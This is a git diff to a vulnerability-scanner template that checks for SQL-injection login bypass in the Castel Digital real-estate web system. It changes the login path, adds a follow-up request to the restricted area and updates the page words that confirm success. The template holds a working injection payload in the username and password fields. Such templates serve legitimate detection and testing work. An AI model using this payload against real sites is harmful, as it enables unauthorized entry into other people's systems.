diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index f171d74341..c4438fae6b 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -16,18 +16,23 @@ info: http: - raw: - | - POST /restrito/login HTTP/1.1 + POST /restrito/login/sub/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x + + - | + GET /restrito/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word words: - - "Sistema Web para Imobiliárias e Corretores" - - "Área Restrita" + - "Banner" + - "Construtoras" condition: and - type: status status: